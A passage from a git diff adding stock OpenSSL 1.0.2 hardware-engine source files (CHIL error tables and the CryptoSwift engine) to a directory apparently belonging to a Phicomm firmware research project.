+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* OPENSSL_NO_DYNAMIC_ENGINE */
+# endif                         /* !OPENSSL_NO_HW_CHIL */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil.ec
new file mode 100644
index 0000000..b5a76e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil.ec
@@ -0,0 +1 @@
+L HWCRHK	e_chil_err.h			e_chil_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil_err.c
new file mode 100644
index 0000000..00fbf8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil_err.c
@@ -0,0 +1,157 @@
+/* e_chil_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_chil_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA HWCRHK_str_functs[] = {
+    {ERR_FUNC(HWCRHK_F_HWCRHK_CTRL), "HWCRHK_CTRL"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_FINISH), "HWCRHK_FINISH"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_GET_PASS), "HWCRHK_GET_PASS"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_INIT), "HWCRHK_INIT"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_INSERT_CARD), "HWCRHK_INSERT_CARD"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_LOAD_PRIVKEY), "HWCRHK_LOAD_PRIVKEY"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_LOAD_PUBKEY), "HWCRHK_LOAD_PUBKEY"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_MOD_EXP), "HWCRHK_MOD_EXP"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_RAND_BYTES), "HWCRHK_RAND_BYTES"},
+    {ERR_FUNC(HWCRHK_F_HWCRHK_RSA_MOD_EXP), "HWCRHK_RSA_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA HWCRHK_str_reasons[] = {
+    {ERR_REASON(HWCRHK_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(HWCRHK_R_BIO_WAS_FREED), "bio was freed"},
+    {ERR_REASON(HWCRHK_R_CHIL_ERROR), "chil error"},
+    {ERR_REASON(HWCRHK_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(HWCRHK_R_DSO_FAILURE), "dso failure"},
+    {ERR_REASON(HWCRHK_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {ERR_REASON(HWCRHK_R_NOT_INITIALISED), "not initialised"},
+    {ERR_REASON(HWCRHK_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(HWCRHK_R_NO_CALLBACK), "no callback"},
+    {ERR_REASON(HWCRHK_R_NO_KEY), "no key"},
+    {ERR_REASON(HWCRHK_R_PRIVATE_KEY_ALGORITHMS_DISABLED),
+     "private key algorithms disabled"},
+    {ERR_REASON(HWCRHK_R_REQUEST_FAILED), "request failed"},
+    {ERR_REASON(HWCRHK_R_REQUEST_FALLBACK), "request fallback"},
+    {ERR_REASON(HWCRHK_R_UNIT_FAILURE), "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef HWCRHK_LIB_NAME
+static ERR_STRING_DATA HWCRHK_lib_name[] = {
+    {0, HWCRHK_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int HWCRHK_lib_error_code = 0;
+static int HWCRHK_error_init = 1;
+
+static void ERR_load_HWCRHK_strings(void)
+{
+    if (HWCRHK_lib_error_code == 0)
+        HWCRHK_lib_error_code = ERR_get_next_error_library();
+
+    if (HWCRHK_error_init) {
+        HWCRHK_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(HWCRHK_lib_error_code, HWCRHK_str_functs);
+        ERR_load_strings(HWCRHK_lib_error_code, HWCRHK_str_reasons);
+#endif
+
+#ifdef HWCRHK_LIB_NAME
+        HWCRHK_lib_name->error = ERR_PACK(HWCRHK_lib_error_code, 0, 0);
+        ERR_load_strings(0, HWCRHK_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_HWCRHK_strings(void)
+{
+    if (HWCRHK_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(HWCRHK_lib_error_code, HWCRHK_str_functs);
+        ERR_unload_strings(HWCRHK_lib_error_code, HWCRHK_str_reasons);
+#endif
+
+#ifdef HWCRHK_LIB_NAME
+        ERR_unload_strings(0, HWCRHK_lib_name);
+#endif
+        HWCRHK_error_init = 1;
+    }
+}
+
+static void ERR_HWCRHK_error(int function, int reason, char *file, int line)
+{
+    if (HWCRHK_lib_error_code == 0)
+        HWCRHK_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(HWCRHK_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil_err.h
new file mode 100644
index 0000000..d86a4ce
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil_err.h
@@ -0,0 +1,105 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_HWCRHK_ERR_H
+# define HEADER_HWCRHK_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_HWCRHK_strings(void);
+static void ERR_unload_HWCRHK_strings(void);
+static void ERR_HWCRHK_error(int function, int reason, char *file, int line);
+# define HWCRHKerr(f,r) ERR_HWCRHK_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the HWCRHK functions. */
+
+/* Function codes. */
+# define HWCRHK_F_HWCRHK_CTRL                             100
+# define HWCRHK_F_HWCRHK_FINISH                           101
+# define HWCRHK_F_HWCRHK_GET_PASS                         102
+# define HWCRHK_F_HWCRHK_INIT                             103
+# define HWCRHK_F_HWCRHK_INSERT_CARD                      104
+# define HWCRHK_F_HWCRHK_LOAD_PRIVKEY                     105
+# define HWCRHK_F_HWCRHK_LOAD_PUBKEY                      106
+# define HWCRHK_F_HWCRHK_MOD_EXP                          107
+# define HWCRHK_F_HWCRHK_RAND_BYTES                       108
+# define HWCRHK_F_HWCRHK_RSA_MOD_EXP                      109
+
+/* Reason codes. */
+# define HWCRHK_R_ALREADY_LOADED                          100
+# define HWCRHK_R_BIO_WAS_FREED                           101
+# define HWCRHK_R_CHIL_ERROR                              102
+# define HWCRHK_R_CTRL_COMMAND_NOT_IMPLEMENTED            103
+# define HWCRHK_R_DSO_FAILURE                             104
+# define HWCRHK_R_MISSING_KEY_COMPONENTS                  105
+# define HWCRHK_R_NOT_INITIALISED                         106
+# define HWCRHK_R_NOT_LOADED                              107
+# define HWCRHK_R_NO_CALLBACK                             108
+# define HWCRHK_R_NO_KEY                                  109
+# define HWCRHK_R_PRIVATE_KEY_ALGORITHMS_DISABLED         110
+# define HWCRHK_R_REQUEST_FAILED                          111
+# define HWCRHK_R_REQUEST_FALLBACK                        112
+# define HWCRHK_R_UNIT_FAILURE                            113
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift.c
new file mode 100644
index 0000000..c429802
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift.c
@@ -0,0 +1,1103 @@
+/* crypto/engine/hw_cswift.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/rand.h>
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_CSWIFT
+
+/*
+ * Attribution notice: Rainbow have generously allowed me to reproduce the
+ * necessary definitions here from their API. This means the support can
+ * build independently of whether application builders have the API or
+ * hardware. This will allow developers to easily produce software that has
+ * latent hardware support for any users that have accelerators installed,
+ * without the developers themselves needing anything extra. I have only
+ * clipped the parts from the CryptoSwift header files that are (or seem)
+ * relevant to the CryptoSwift support code. This is simply to keep the file
+ * sizes reasonable. [Geoff]
+ */
+#  ifdef FLAT_INC
+#   include "cswift.h"
+#  else
+#   include "vendor_defns/cswift.h"
+#  endif
+
+#  define CSWIFT_LIB_NAME "cswift engine"
+#  include "e_cswift_err.c"
+
+#  define DECIMAL_SIZE(type)      ((sizeof(type)*8+2)/3+1)
+
+static int cswift_destroy(ENGINE *e);
+static int cswift_init(ENGINE *e);
+static int cswift_finish(ENGINE *e);
+static int cswift_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+#  ifndef OPENSSL_NO_RSA
+static int cswift_bn_32copy(SW_LARGENUMBER *out, const BIGNUM *in);
+#  endif
+
+/* BIGNUM stuff */
+static int cswift_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                          const BIGNUM *m, BN_CTX *ctx);
+#  ifndef OPENSSL_NO_RSA
+static int cswift_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *q, const BIGNUM *dmp1,
+                              const BIGNUM *dmq1, const BIGNUM *iqmp,
+                              BN_CTX *ctx);
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+/* RSA stuff */
+static int cswift_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx);
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int cswift_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                               const BIGNUM *m, BN_CTX *ctx,
+                               BN_MONT_CTX *m_ctx);
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* DSA stuff */
+static DSA_SIG *cswift_dsa_sign(const unsigned char *dgst, int dlen,
+                                DSA *dsa);
+static int cswift_dsa_verify(const unsigned char *dgst, int dgst_len,
+                             DSA_SIG *sig, DSA *dsa);
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* DH stuff */
+/* This function is alised to mod_exp (with the DH and mont dropped). */
+static int cswift_mod_exp_dh(const DH *dh, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx);
+#  endif
+
+/* RAND stuff */
+static int cswift_rand_bytes(unsigned char *buf, int num);
+static int cswift_rand_status(void);
+
+/* The definitions for control commands specific to this engine */
+#  define CSWIFT_CMD_SO_PATH              ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN cswift_cmd_defns[] = {
+    {CSWIFT_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'cswift' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD cswift_rsa = {
+    "CryptoSwift RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    cswift_rsa_mod_exp,
+    cswift_mod_exp_mont,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* Our internal DSA_METHOD that we provide pointers to */
+static DSA_METHOD cswift_dsa = {
+    "CryptoSwift DSA method",
+    cswift_dsa_sign,
+    NULL,                       /* dsa_sign_setup */
+    cswift_dsa_verify,
+    NULL,                       /* dsa_mod_exp */
+    NULL,                       /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* dsa_paramgen */
+    NULL                        /* dsa_keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+static DH_METHOD cswift_dh = {
+    "CryptoSwift DH method",
+    NULL,
+    NULL,
+    cswift_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL
+};
+#  endif
+
+static RAND_METHOD cswift_random = {
+    /* "CryptoSwift RAND method", */
+    NULL,
+    cswift_rand_bytes,
+    NULL,
+    NULL,
+    cswift_rand_bytes,
+    cswift_rand_status,
+};
+
+/* Constants used when creating the ENGINE */
+static const char *engine_cswift_id = "cswift";
+static const char *engine_cswift_name = "CryptoSwift hardware engine support";
+
+/*
+ * This internal function is used by ENGINE_cswift() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth2;
+#  endif
+    if (!ENGINE_set_id(e, engine_cswift_id) ||
+        !ENGINE_set_name(e, engine_cswift_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &cswift_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &cswift_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &cswift_dh) ||
+#  endif
+        !ENGINE_set_RAND(e, &cswift_random) ||
+        !ENGINE_set_destroy_function(e, cswift_destroy) ||
+        !ENGINE_set_init_function(e, cswift_init) ||
+        !ENGINE_set_finish_function(e, cswift_finish) ||
+        !ENGINE_set_ctrl_function(e, cswift_ctrl) ||
+        !ENGINE_set_cmd_defns(e, cswift_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * cswift-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    cswift_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    cswift_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    cswift_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    cswift_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth2 = DH_OpenSSL();
+    cswift_dh.generate_key = meth2->generate_key;
+    cswift_dh.compute_key = meth2->compute_key;
+#  endif
+
+    /* Ensure the cswift error handling is set up */
+    ERR_load_CSWIFT_strings();
+    return 1;
+}
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_cswift(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_cswift(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_cswift();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * CryptoSwift library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+static DSO *cswift_dso = NULL;
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+t_swAcquireAccContext *p_CSwift_AcquireAccContext = NULL;
+t_swAttachKeyParam *p_CSwift_AttachKeyParam = NULL;
+t_swSimpleRequest *p_CSwift_SimpleRequest = NULL;
+t_swReleaseAccContext *p_CSwift_ReleaseAccContext = NULL;
+
+/* Used in the DSO operations. */
+static const char *CSWIFT_LIBNAME = NULL;
+static const char *get_CSWIFT_LIBNAME(void)
+{
+    if (CSWIFT_LIBNAME)
+        return CSWIFT_LIBNAME;
+    return "swift";
+}
+
+static void free_CSWIFT_LIBNAME(void)
+{
+    if (CSWIFT_LIBNAME)
+        OPENSSL_free((void *)CSWIFT_LIBNAME);
+    CSWIFT_LIBNAME = NULL;
+}
+
+static long set_CSWIFT_LIBNAME(const char *name)
+{
+    free_CSWIFT_LIBNAME();
+    return (((CSWIFT_LIBNAME = BUF_strdup(name)) != NULL) ? 1 : 0);
+}
+
+static const char *CSWIFT_F1 = "swAcquireAccContext";
+static const char *CSWIFT_F2 = "swAttachKeyParam";
+static const char *CSWIFT_F3 = "swSimpleRequest";
+static const char *CSWIFT_F4 = "swReleaseAccContext";
+
+/*
+ * CryptoSwift library functions and mechanics - these are used by the
+ * higher-level functions further down. NB: As and where there's no error
+ * checking, take a look lower down where these functions are called, the
+ * checking and error handling is probably down there.
+ */
+
+/* utility function to obtain a context */
+static int get_context(SW_CONTEXT_HANDLE *hac)
+{
+    SW_STATUS status;
+
+    status = p_CSwift_AcquireAccContext(hac);
+    if (status != SW_OK)
+        return 0;
+    return 1;
+}
+
+/* similarly to release one. */
+static void release_context(SW_CONTEXT_HANDLE hac)
+{
+    p_CSwift_ReleaseAccContext(hac);
+}
+
+/* Destructor (complements the "ENGINE_cswift()" constructor) */
+static int cswift_destroy(ENGINE *e)
+{
+    free_CSWIFT_LIBNAME();
+    ERR_unload_CSWIFT_strings();
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int cswift_init(ENGINE *e)
+{
+    SW_CONTEXT_HANDLE hac;
+    t_swAcquireAccContext *p1;
+    t_swAttachKeyParam *p2;
+    t_swSimpleRequest *p3;
+    t_swReleaseAccContext *p4;
+
+    if (cswift_dso != NULL) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_INIT, CSWIFT_R_ALREADY_LOADED);
+        goto err;
+    }
+    /* Attempt to load libswift.so/swift.dll/whatever. */
+    cswift_dso = DSO_load(NULL, get_CSWIFT_LIBNAME(), NULL, 0);
+    if (cswift_dso == NULL) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_INIT, CSWIFT_R_NOT_LOADED);
+        goto err;
+    }
+    if (!(p1 = (t_swAcquireAccContext *)
+          DSO_bind_func(cswift_dso, CSWIFT_F1)) ||
+        !(p2 = (t_swAttachKeyParam *)
+          DSO_bind_func(cswift_dso, CSWIFT_F2)) ||
+        !(p3 = (t_swSimpleRequest *)
+          DSO_bind_func(cswift_dso, CSWIFT_F3)) ||
+        !(p4 = (t_swReleaseAccContext *)
+          DSO_bind_func(cswift_dso, CSWIFT_F4))) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_INIT, CSWIFT_R_NOT_LOADED);
+        goto err;
+    }
+    /* Copy the pointers */
+    p_CSwift_AcquireAccContext = p1;
+    p_CSwift_AttachKeyParam = p2;
+    p_CSwift_SimpleRequest = p3;
+    p_CSwift_ReleaseAccContext = p4;
+    /*
+     * Try and get a context - if not, we may have a DSO but no accelerator!
+     */
+    if (!get_context(&hac)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_INIT, CSWIFT_R_UNIT_FAILURE);
+        goto err;
+    }
+    release_context(hac);
+    /* Everything's fine. */
+    return 1;
+ err:
+    if (cswift_dso) {
+        DSO_free(cswift_dso);
+        cswift_dso = NULL;
+    }
+    p_CSwift_AcquireAccContext = NULL;
+    p_CSwift_AttachKeyParam = NULL;
+    p_CSwift_SimpleRequest = NULL;
+    p_CSwift_ReleaseAccContext = NULL;
+    return 0;
+}
+
+static int cswift_finish(ENGINE *e)
+{
+    free_CSWIFT_LIBNAME();
+    if (cswift_dso == NULL) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_FINISH, CSWIFT_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(cswift_dso)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_FINISH, CSWIFT_R_UNIT_FAILURE);
+        return 0;
+    }
+    cswift_dso = NULL;
+    p_CSwift_AcquireAccContext = NULL;
+    p_CSwift_AttachKeyParam = NULL;
+    p_CSwift_SimpleRequest = NULL;
+    p_CSwift_ReleaseAccContext = NULL;
+    return 1;
+}
+
+static int cswift_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int initialised = ((cswift_dso == NULL) ? 0 : 1);
+    switch (cmd) {
+    case CSWIFT_CMD_SO_PATH:
+        if (p == NULL) {
+            CSWIFTerr(CSWIFT_F_CSWIFT_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            CSWIFTerr(CSWIFT_F_CSWIFT_CTRL, CSWIFT_R_ALREADY_LOADED);
+            return 0;
+        }
+        return set_CSWIFT_LIBNAME((const char *)p);
+    default:
+        break;
+    }
+    CSWIFTerr(CSWIFT_F_CSWIFT_CTRL, CSWIFT_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+/* Un petit mod_exp */
+static int cswift_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
